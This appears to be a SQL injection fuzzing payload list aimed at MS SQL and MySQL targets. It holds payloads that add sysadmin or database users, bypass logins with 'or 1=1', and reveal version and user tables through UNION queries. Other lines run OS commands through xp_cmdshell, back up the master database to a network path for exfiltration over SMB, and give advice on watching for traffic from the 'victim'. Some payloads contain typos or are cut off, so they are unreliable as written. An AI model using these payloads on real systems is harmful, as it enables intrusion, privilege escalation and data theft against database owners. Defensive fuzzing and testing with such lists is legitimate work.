' exec sp_addsrvrolemember 'name' , 'sysadmin' –

' insert into mysql.user (user, host, password) values ('name', 'localhost', password('pass123')) –

' grant connect to name; grant resource to name; –

' insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)

' or 1=1 –

' union (select NULL, (select @@version)) –

' union (select @@version) –

' union (select NULL, NULL, (select @@version)) –

' union (select NULL, NULL, NULL, (select @@version)) –

' union (select NULL, NULL, NULL, NULL, (select @@version)) –

' union (select NULL, NULL, NULL, NULL, NULL, (select @@version)) –

ms-sqli info disclosure payload fuzzfile

replace regex with your fuzzer for best results

run wireshark or tcpdump, look for incoming smb or icmp packets from victim

might need to terminate payloads with ;–

select @@version

select @@servernamee

select @@microsoftversione

select * from master..sysserverse

select * from sysusers

exec master..xp_cmdshell 'ipconfig+/all'

exec master..xp_cmdshell 'net+view'

exec master..xp_cmdshell 'net+users'

exec master..xp_cmdshell 'ping+'

BACKUP database master to disks='\\backupdb.dat'